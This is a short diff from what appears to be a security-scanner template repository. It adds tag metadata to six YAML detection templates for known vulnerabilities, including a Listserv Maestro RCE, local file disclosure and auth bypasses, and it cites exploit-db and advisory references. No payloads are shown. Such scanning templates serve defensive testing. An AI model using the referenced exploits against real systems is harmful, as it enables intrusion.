index 3f04c30a27..56b6d5f00f 100644
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ tags: rce,listserv,ognl
requests:
- method: GET
diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml
index b8ebf42adb..04a5d1b654 100644
--- a/vulnerabilities/other/cacti-weathermap-file-write.yaml
+++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.freebuf.com/articles/system/125177.html
+ tags: injection,cacti
requests:
- method: GET
diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
index f4fa330ad9..04795427db 100644
--- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml
+++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
+ tags: exposure,resin
requests:
- method: GET
diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml
index 062d1759ab..a62783f871 100644
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
+ tags: lfi,pmb
requests:
- method: GET
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index d0dcd358f6..6f612b4f78 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48877
-
+ tags: auth-bypass
requests:
- raw:
- |
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
index fbc1e03821..65c7df9984 100644
--- a/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/vulnerabilities/other/zms-auth-bypass.yaml
@@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48880
+ tags: auth-bypass,zms
requests:
- raw: